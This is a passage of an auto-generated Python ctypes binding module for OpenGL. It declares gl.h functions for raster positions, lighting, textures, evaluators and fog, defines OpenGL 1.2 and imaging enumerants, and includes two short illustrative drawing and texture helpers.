glRasterPos2sv = _link_function('glRasterPos2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1125
glRasterPos3dv = _link_function('glRasterPos3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1126
glRasterPos3fv = _link_function('glRasterPos3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1127
glRasterPos3iv = _link_function('glRasterPos3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1128
glRasterPos3sv = _link_function('glRasterPos3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1130
glRasterPos4dv = _link_function('glRasterPos4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1131
glRasterPos4fv = _link_function('glRasterPos4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1132
glRasterPos4iv = _link_function('glRasterPos4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1133
glRasterPos4sv = _link_function('glRasterPos4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1136
glRectd = _link_function('glRectd', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1137
glRectf = _link_function('glRectf', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1138
glRecti = _link_function('glRecti', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1139
glRects = _link_function('glRects', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1142
glRectdv = _link_function('glRectdv', None, [POINTER(GLdouble), POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1143
glRectfv = _link_function('glRectfv', None, [POINTER(GLfloat), POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1144
glRectiv = _link_function('glRectiv', None, [POINTER(GLint), POINTER(GLint)], None)
# /usr/include/GL/gl.h:1145
glRectsv = _link_function('glRectsv', None, [POINTER(GLshort), POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1152
glVertexPointer = _link_function('glVertexPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1155
glNormalPointer = _link_function('glNormalPointer', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1158
glColorPointer = _link_function('glColorPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1161
glIndexPointer = _link_function('glIndexPointer', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1164
glTexCoordPointer = _link_function('glTexCoordPointer', None, [GLint, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1167
glEdgeFlagPointer = _link_function('glEdgeFlagPointer', None, [GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1169
glGetPointerv = _link_function('glGetPointerv', None, [GLenum, POINTER(POINTER(GLvoid))], None)
# /usr/include/GL/gl.h:1171
glArrayElement = _link_function('glArrayElement', None, [GLint], None)
# /usr/include/GL/gl.h:1173
glDrawArrays = _link_function('glDrawArrays', None, [GLenum, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1175
glDrawElements = _link_function('glDrawElements', None, [GLenum, GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1178
glInterleavedArrays = _link_function('glInterleavedArrays', None, [GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1185
glShadeModel = _link_function('glShadeModel', None, [GLenum], None)
# /usr/include/GL/gl.h:1187
glLightf = _link_function('glLightf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1188
glLighti = _link_function('glLighti', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1189
glLightfv = _link_function('glLightfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1191
glLightiv = _link_function('glLightiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1194
glGetLightfv = _link_function('glGetLightfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1196
glGetLightiv = _link_function('glGetLightiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1199
glLightModelf = _link_function('glLightModelf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1200
glLightModeli = _link_function('glLightModeli', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1201
glLightModelfv = _link_function('glLightModelfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1202
glLightModeliv = _link_function('glLightModeliv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1204
glMaterialf = _link_function('glMaterialf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1205
glMateriali = _link_function('glMateriali', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1206
glMaterialfv = _link_function('glMaterialfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1207
glMaterialiv = _link_function('glMaterialiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1209
glGetMaterialfv = _link_function('glGetMaterialfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1210
glGetMaterialiv = _link_function('glGetMaterialiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1212
glColorMaterial = _link_function('glColorMaterial', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:1219
glPixelZoom = _link_function('glPixelZoom', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1221
glPixelStoref = _link_function('glPixelStoref', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1222
glPixelStorei = _link_function('glPixelStorei', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1224
glPixelTransferf = _link_function('glPixelTransferf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1225
glPixelTransferi = _link_function('glPixelTransferi', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1227
glPixelMapfv = _link_function('glPixelMapfv', None, [GLenum, GLsizei, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1229
glPixelMapuiv = _link_function('glPixelMapuiv', None, [GLenum, GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1231
glPixelMapusv = _link_function('glPixelMapusv', None, [GLenum, GLsizei, POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1234
glGetPixelMapfv = _link_function('glGetPixelMapfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1235
glGetPixelMapuiv = _link_function('glGetPixelMapuiv', None, [GLenum, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1236
glGetPixelMapusv = _link_function('glGetPixelMapusv', None, [GLenum, POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1238
glBitmap = _link_function('glBitmap', None, [GLsizei, GLsizei, GLfloat, GLfloat, GLfloat, GLfloat, POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1243
glReadPixels = _link_function('glReadPixels', None, [GLint, GLint, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1248
glDrawPixels = _link_function('glDrawPixels', None, [GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1252
glCopyPixels = _link_function('glCopyPixels', None, [GLint, GLint, GLsizei, GLsizei, GLenum], None)
# /usr/include/GL/gl.h:1260
glStencilFunc = _link_function('glStencilFunc', None, [GLenum, GLint, GLuint], None)
# /usr/include/GL/gl.h:1262
glStencilMask = _link_function('glStencilMask', None, [GLuint], None)
# /usr/include/GL/gl.h:1264
glStencilOp = _link_function('glStencilOp', None, [GLenum, GLenum, GLenum], None)
# /usr/include/GL/gl.h:1266
glClearStencil = _link_function('glClearStencil', None, [GLint], None)
# /usr/include/GL/gl.h:1274
glTexGend = _link_function('glTexGend', None, [GLenum, GLenum, GLdouble], None)
# /usr/include/GL/gl.h:1275
glTexGenf = _link_function('glTexGenf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1276
glTexGeni = _link_function('glTexGeni', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1278
glTexGendv = _link_function('glTexGendv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1279
glTexGenfv = _link_function('glTexGenfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1280
glTexGeniv = _link_function('glTexGeniv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1282
glGetTexGendv = _link_function('glGetTexGendv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1283
glGetTexGenfv = _link_function('glGetTexGenfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1284
glGetTexGeniv = _link_function('glGetTexGeniv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1287
glTexEnvf = _link_function('glTexEnvf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1288
glTexEnvi = _link_function('glTexEnvi', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1290
glTexEnvfv = _link_function('glTexEnvfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1291
glTexEnviv = _link_function('glTexEnviv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1293
glGetTexEnvfv = _link_function('glGetTexEnvfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1294
glGetTexEnviv = _link_function('glGetTexEnviv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1297
glTexParameterf = _link_function('glTexParameterf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1298
glTexParameteri = _link_function('glTexParameteri', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1300
glTexParameterfv = _link_function('glTexParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1302
glTexParameteriv = _link_function('glTexParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1305
glGetTexParameterfv = _link_function('glGetTexParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1307
glGetTexParameteriv = _link_function('glGetTexParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1310
glGetTexLevelParameterfv = _link_function('glGetTexLevelParameterfv', None, [GLenum, GLint, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1312
glGetTexLevelParameteriv = _link_function('glGetTexLevelParameteriv', None, [GLenum, GLint, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1316
glTexImage1D = _link_function('glTexImage1D', None, [GLenum, GLint, GLint, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1322
glTexImage2D = _link_function('glTexImage2D', None, [GLenum, GLint, GLint, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1328
glGetTexImage = _link_function('glGetTexImage', None, [GLenum, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1335
glGenTextures = _link_function('glGenTextures', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1337
glDeleteTextures = _link_function('glDeleteTextures', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1339
glBindTexture = _link_function('glBindTexture', None, [GLenum, GLuint], None)
# /usr/include/GL/gl.h:1341
glPrioritizeTextures = _link_function('glPrioritizeTextures', None, [GLsizei, POINTER(GLuint), POINTER(GLclampf)], None)
# /usr/include/GL/gl.h:1345
glAreTexturesResident = _link_function('glAreTexturesResident', GLboolean, [GLsizei, POINTER(GLuint), POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:1349
glIsTexture = _link_function('glIsTexture', GLboolean, [GLuint], None)
# /usr/include/GL/gl.h:1352
glTexSubImage1D = _link_function('glTexSubImage1D', None, [GLenum, GLint, GLint, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1358
glTexSubImage2D = _link_function('glTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1365
glCopyTexImage1D = _link_function('glCopyTexImage1D', None, [GLenum, GLint, GLenum, GLint, GLint, GLsizei, GLint], None)
# /usr/include/GL/gl.h:1371
glCopyTexImage2D = _link_function('glCopyTexImage2D', None, [GLenum, GLint, GLenum, GLint, GLint, GLsizei, GLsizei, GLint], None)
# /usr/include/GL/gl.h:1378
glCopyTexSubImage1D = _link_function('glCopyTexSubImage1D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1383
glCopyTexSubImage2D = _link_function('glCopyTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei], None)
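
# A minimal usage sketch of the texture-object bindings declared above.
# Assumptions: a current OpenGL context exists (e.g. a pyglet window), and
# GL_TEXTURE_2D / GL_TEXTURE_MIN_FILTER / GL_LINEAR are the enumerants
# defined earlier in this module. The pixel upload via glTexImage2D is
# omitted because it needs an application-supplied buffer. The function is
# only defined, never called, so importing this module is unaffected.
def _example_create_texture():
    """Create, bind, and configure one texture object (illustrative sketch)."""
    from ctypes import byref
    tex = GLuint()
    glGenTextures(1, byref(tex))             # reserve one texture name
    glBindTexture(GL_TEXTURE_2D, tex.value)  # make it the current 2D texture
    glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
    return tex.value
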
# /usr/include/GL/gl.h:1393
glMap1d = _link_function('glMap1d', None, [GLenum, GLdouble, GLdouble, GLint, GLint, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1396
glMap1f = _link_function('glMap1f', None, [GLenum, GLfloat, GLfloat, GLint, GLint, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1400
glMap2d = _link_function('glMap2d', None, [GLenum, GLdouble, GLdouble, GLint, GLint, GLdouble, GLdouble, GLint, GLint, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1404
glMap2f = _link_function('glMap2f', None, [GLenum, GLfloat, GLfloat, GLint, GLint, GLfloat, GLfloat, GLint, GLint, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1409
glGetMapdv = _link_function('glGetMapdv', None, [GLenum, GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1410
glGetMapfv = _link_function('glGetMapfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1411
glGetMapiv = _link_function('glGetMapiv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1413
glEvalCoord1d = _link_function('glEvalCoord1d', None, [GLdouble], None)
# /usr/include/GL/gl.h:1414
glEvalCoord1f = _link_function('glEvalCoord1f', None, [GLfloat], None)
# /usr/include/GL/gl.h:1416
glEvalCoord1dv = _link_function('glEvalCoord1dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1417
glEvalCoord1fv = _link_function('glEvalCoord1fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1419
glEvalCoord2d = _link_function('glEvalCoord2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1420
glEvalCoord2f = _link_function('glEvalCoord2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1422
glEvalCoord2dv = _link_function('glEvalCoord2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1423
glEvalCoord2fv = _link_function('glEvalCoord2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1425
glMapGrid1d = _link_function('glMapGrid1d', None, [GLint, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1426
glMapGrid1f = _link_function('glMapGrid1f', None, [GLint, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1428
glMapGrid2d = _link_function('glMapGrid2d', None, [GLint, GLdouble, GLdouble, GLint, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1430
glMapGrid2f = _link_function('glMapGrid2f', None, [GLint, GLfloat, GLfloat, GLint, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1433
glEvalPoint1 = _link_function('glEvalPoint1', None, [GLint], None)
# /usr/include/GL/gl.h:1435
glEvalPoint2 = _link_function('glEvalPoint2', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1437
glEvalMesh1 = _link_function('glEvalMesh1', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:1439
glEvalMesh2 = _link_function('glEvalMesh2', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1446
glFogf = _link_function('glFogf', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1448
glFogi = _link_function('glFogi', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1450
glFogfv = _link_function('glFogfv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1452
glFogiv = _link_function('glFogiv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1459
glFeedbackBuffer = _link_function('glFeedbackBuffer', None, [GLsizei, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1461
glPassThrough = _link_function('glPassThrough', None, [GLfloat], None)
# /usr/include/GL/gl.h:1463
glSelectBuffer = _link_function('glSelectBuffer', None, [GLsizei, POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1465
glInitNames = _link_function('glInitNames', None, [], None)
# /usr/include/GL/gl.h:1467
glLoadName = _link_function('glLoadName', None, [GLuint], None)
# /usr/include/GL/gl.h:1469
glPushName = _link_function('glPushName', None, [GLuint], None)
# /usr/include/GL/gl.h:1471
glPopName = _link_function('glPopName', None, [], None)
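
# A minimal sketch of immediate-mode drawing with the glBegin/glEnd family
# bound above. It assumes a current OpenGL context and that GL_TRIANGLES is
# the enumerant defined earlier in this module; the function is defined for
# illustration only and is never called at import time.
def _example_draw_triangle():
    """Draw one colored triangle between glBegin/glEnd (illustrative sketch)."""
    glBegin(GL_TRIANGLES)
    glColor3f(1.0, 0.0, 0.0)
    glVertex2f(-0.5, -0.5)
    glColor3f(0.0, 1.0, 0.0)
    glVertex2f(0.5, -0.5)
    glColor3f(0.0, 0.0, 1.0)
    glVertex2f(0.0, 0.5)
    glEnd()

# OpenGL 1.2 core additions follow: new enumerants first, then the
# glDrawRangeElements / glTexImage3D family of entry points.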
GL_RESCALE_NORMAL = 32826 # /usr/include/GL/gl.h:1479
GL_CLAMP_TO_EDGE = 33071 # /usr/include/GL/gl.h:1480
GL_MAX_ELEMENTS_VERTICES = 33000 # /usr/include/GL/gl.h:1481
GL_MAX_ELEMENTS_INDICES = 33001 # /usr/include/GL/gl.h:1482
GL_BGR = 32992 # /usr/include/GL/gl.h:1483
GL_BGRA = 32993 # /usr/include/GL/gl.h:1484
GL_UNSIGNED_BYTE_3_3_2 = 32818 # /usr/include/GL/gl.h:1485
GL_UNSIGNED_BYTE_2_3_3_REV = 33634 # /usr/include/GL/gl.h:1486
GL_UNSIGNED_SHORT_5_6_5 = 33635 # /usr/include/GL/gl.h:1487
GL_UNSIGNED_SHORT_5_6_5_REV = 33636 # /usr/include/GL/gl.h:1488
GL_UNSIGNED_SHORT_4_4_4_4 = 32819 # /usr/include/GL/gl.h:1489
GL_UNSIGNED_SHORT_4_4_4_4_REV = 33637 # /usr/include/GL/gl.h:1490
GL_UNSIGNED_SHORT_5_5_5_1 = 32820 # /usr/include/GL/gl.h:1491
GL_UNSIGNED_SHORT_1_5_5_5_REV = 33638 # /usr/include/GL/gl.h:1492
GL_UNSIGNED_INT_8_8_8_8 = 32821 # /usr/include/GL/gl.h:1493
GL_UNSIGNED_INT_8_8_8_8_REV = 33639 # /usr/include/GL/gl.h:1494
GL_UNSIGNED_INT_10_10_10_2 = 32822 # /usr/include/GL/gl.h:1495
GL_UNSIGNED_INT_2_10_10_10_REV = 33640 # /usr/include/GL/gl.h:1496
GL_LIGHT_MODEL_COLOR_CONTROL = 33272 # /usr/include/GL/gl.h:1497
GL_SINGLE_COLOR = 33273 # /usr/include/GL/gl.h:1498
GL_SEPARATE_SPECULAR_COLOR = 33274 # /usr/include/GL/gl.h:1499
GL_TEXTURE_MIN_LOD = 33082 # /usr/include/GL/gl.h:1500
GL_TEXTURE_MAX_LOD = 33083 # /usr/include/GL/gl.h:1501
GL_TEXTURE_BASE_LEVEL = 33084 # /usr/include/GL/gl.h:1502
GL_TEXTURE_MAX_LEVEL = 33085 # /usr/include/GL/gl.h:1503
GL_SMOOTH_POINT_SIZE_RANGE = 2834 # /usr/include/GL/gl.h:1504
GL_SMOOTH_POINT_SIZE_GRANULARITY = 2835 # /usr/include/GL/gl.h:1505
GL_SMOOTH_LINE_WIDTH_RANGE = 2850 # /usr/include/GL/gl.h:1506
GL_SMOOTH_LINE_WIDTH_GRANULARITY = 2851 # /usr/include/GL/gl.h:1507
GL_ALIASED_POINT_SIZE_RANGE = 33901 # /usr/include/GL/gl.h:1508
GL_ALIASED_LINE_WIDTH_RANGE = 33902 # /usr/include/GL/gl.h:1509
GL_PACK_SKIP_IMAGES = 32875 # /usr/include/GL/gl.h:1510
GL_PACK_IMAGE_HEIGHT = 32876 # /usr/include/GL/gl.h:1511
GL_UNPACK_SKIP_IMAGES = 32877 # /usr/include/GL/gl.h:1512
GL_UNPACK_IMAGE_HEIGHT = 32878 # /usr/include/GL/gl.h:1513
GL_TEXTURE_3D = 32879 # /usr/include/GL/gl.h:1514
GL_PROXY_TEXTURE_3D = 32880 # /usr/include/GL/gl.h:1515
GL_TEXTURE_DEPTH = 32881 # /usr/include/GL/gl.h:1516
GL_TEXTURE_WRAP_R = 32882 # /usr/include/GL/gl.h:1517
GL_MAX_3D_TEXTURE_SIZE = 32883 # /usr/include/GL/gl.h:1518
GL_TEXTURE_BINDING_3D = 32874 # /usr/include/GL/gl.h:1519
# /usr/include/GL/gl.h:1521
glDrawRangeElements = _link_function('glDrawRangeElements', None, [GLenum, GLuint, GLuint, GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1524
glTexImage3D = _link_function('glTexImage3D', None, [GLenum, GLint, GLint, GLsizei, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1531
glTexSubImage3D = _link_function('glTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1538
glCopyTexSubImage3D = _link_function('glCopyTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei], None)
PFNGLDRAWRANGEELEMENTSPROC = CFUNCTYPE(None, GLenum, GLuint, GLuint, GLsizei, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1544
PFNGLTEXIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLsizei, GLsizei, GLsizei, GLint, GLenum, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1545
PFNGLTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)) # /usr/include/GL/gl.h:1546
PFNGLCOPYTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLint, GLint, GLsizei, GLsizei) # /usr/include/GL/gl.h:1547
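# Constants for the optional OpenGL 1.2 imaging subset (ARB_imaging): color
# tables, convolution filters, the color matrix, histogram/minmax queries,
# and constant-color blending.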
GL_CONSTANT_COLOR = 32769 # /usr/include/GL/gl.h:1554
GL_ONE_MINUS_CONSTANT_COLOR = 32770 # /usr/include/GL/gl.h:1555
GL_CONSTANT_ALPHA = 32771 # /usr/include/GL/gl.h:1556
GL_ONE_MINUS_CONSTANT_ALPHA = 32772 # /usr/include/GL/gl.h:1557
GL_COLOR_TABLE = 32976 # /usr/include/GL/gl.h:1558
GL_POST_CONVOLUTION_COLOR_TABLE = 32977 # /usr/include/GL/gl.h:1559
GL_POST_COLOR_MATRIX_COLOR_TABLE = 32978 # /usr/include/GL/gl.h:1560
GL_PROXY_COLOR_TABLE = 32979 # /usr/include/GL/gl.h:1561
GL_PROXY_POST_CONVOLUTION_COLOR_TABLE = 32980 # /usr/include/GL/gl.h:1562
GL_PROXY_POST_COLOR_MATRIX_COLOR_TABLE = 32981 # /usr/include/GL/gl.h:1563
GL_COLOR_TABLE_SCALE = 32982 # /usr/include/GL/gl.h:1564
GL_COLOR_TABLE_BIAS = 32983 # /usr/include/GL/gl.h:1565
GL_COLOR_TABLE_FORMAT = 32984 # /usr/include/GL/gl.h:1566
GL_COLOR_TABLE_WIDTH = 32985 # /usr/include/GL/gl.h:1567
GL_COLOR_TABLE_RED_SIZE = 32986 # /usr/include/GL/gl.h:1568
GL_COLOR_TABLE_GREEN_SIZE = 32987 # /usr/include/GL/gl.h:1569
GL_COLOR_TABLE_BLUE_SIZE = 32988 # /usr/include/GL/gl.h:1570
GL_COLOR_TABLE_ALPHA_SIZE = 32989 # /usr/include/GL/gl.h:1571
GL_COLOR_TABLE_LUMINANCE_SIZE = 32990 # /usr/include/GL/gl.h:1572
GL_COLOR_TABLE_INTENSITY_SIZE = 32991 # /usr/include/GL/gl.h:1573
GL_CONVOLUTION_1D = 32784 # /usr/include/GL/gl.h:1574
GL_CONVOLUTION_2D = 32785 # /usr/include/GL/gl.h:1575
GL_SEPARABLE_2D = 32786 # /usr/include/GL/gl.h:1576
GL_CONVOLUTION_BORDER_MODE = 32787 # /usr/include/GL/gl.h:1577
GL_CONVOLUTION_FILTER_SCALE = 32788 # /usr/include/GL/gl.h:1578
GL_CONVOLUTION_FILTER_BIAS = 32789 # /usr/include/GL/gl.h:1579
GL_REDUCE = 32790 # /usr/include/GL/gl.h:1580
GL_CONVOLUTION_FORMAT = 32791 # /usr/include/GL/gl.h:1581
GL_CONVOLUTION_WIDTH = 32792 # /usr/include/GL/gl.h:1582
GL_CONVOLUTION_HEIGHT = 32793 # /usr/include/GL/gl.h:1583
GL_MAX_CONVOLUTION_WIDTH = 32794 # /usr/include/GL/gl.h:1584
GL_MAX_CONVOLUTION_HEIGHT = 32795 # /usr/include/GL/gl.h:1585
GL_POST_CONVOLUTION_RED_SCALE = 32796 # /usr/include/GL/gl.h:1586
GL_POST_CONVOLUTION_GREEN_SCALE = 32797 # /usr/include/GL/gl.h:1587
GL_POST_CONVOLUTION_BLUE_SCALE = 32798 # /usr/include/GL/gl.h:1588
GL_POST_CONVOLUTION_ALPHA_SCALE = 32799 # /usr/include/GL/gl.h:1589
GL_POST_CONVOLUTION_RED_BIAS = 32800 # /usr/include/GL/gl.h:1590
GL_POST_CONVOLUTION_GREEN_BIAS = 32801 # /usr/include/GL/gl.h:1591
GL_POST_CONVOLUTION_BLUE_BIAS = 32802 # /usr/include/GL/gl.h:1592
GL_POST_CONVOLUTION_ALPHA_BIAS = 32803 # /usr/include/GL/gl.h:1593
GL_CONSTANT_BORDER = 33105 # /usr/include/GL/gl.h:1594
GL_REPLICATE_BORDER = 33107 # /usr/include/GL/gl.h:1595
GL_CONVOLUTION_BORDER_COLOR = 33108 # /usr/include/GL/gl.h:1596
GL_COLOR_MATRIX = 32945 # /usr/include/GL/gl.h:1597
GL_COLOR_MATRIX_STACK_DEPTH = 32946 # /usr/include/GL/gl.h:1598
GL_MAX_COLOR_MATRIX_STACK_DEPTH = 32947 # /usr/include/GL/gl.h:1599
GL_POST_COLOR_MATRIX_RED_SCALE = 32948 # /usr/include/GL/gl.h:1600
GL_POST_COLOR_MATRIX_GREEN_SCALE = 32949 # /usr/include/GL/gl.h:1601
GL_POST_COLOR_MATRIX_BLUE_SCALE = 32950 # /usr/include/GL/gl.h:1602
GL_POST_COLOR_MATRIX_ALPHA_SCALE = 32951 # /usr/include/GL/gl.h:1603
GL_POST_COLOR_MATRIX_RED_BIAS = 32952 # /usr/include/GL/gl.h:1604
GL_POST_COLOR_MATRIX_GREEN_BIAS = 32953 # /usr/include/GL/gl.h:1605
GL_POST_COLOR_MATRIX_BLUE_BIAS = 32954 # /usr/include/GL/gl.h:1606
GL_POST_COLOR_MATRIX_ALPHA_BIAS = 32955 # /usr/include/GL/gl.h:1607
GL_HISTOGRAM = 32804 # /usr/include/GL/gl.h:1608
GL_PROXY_HISTOGRAM = 32805 # /usr/include/GL/gl.h:1609
GL_HISTOGRAM_WIDTH = 32806 # /usr/include/GL/gl.h:1610
GL_HISTOGRAM_FORMAT = 32807 # /usr/include/GL/gl.h:1611
GL_HISTOGRAM_RED_SIZE = 32808 # /usr/include/GL/gl.h:1612
GL_HISTOGRAM_GREEN_SIZE = 32809 # /usr/include/GL/gl.h:1613
GL_HISTOGRAM_BLUE_SIZE = 32810 # /usr/include/GL/gl.h:1614
GL_HISTOGRAM_ALPHA_SIZE = 32811 # /usr/include/GL/gl.h:1615
GL_HISTOGRAM_LUMINANCE_SIZE = 32812 # /usr/include/GL/gl.h:1616
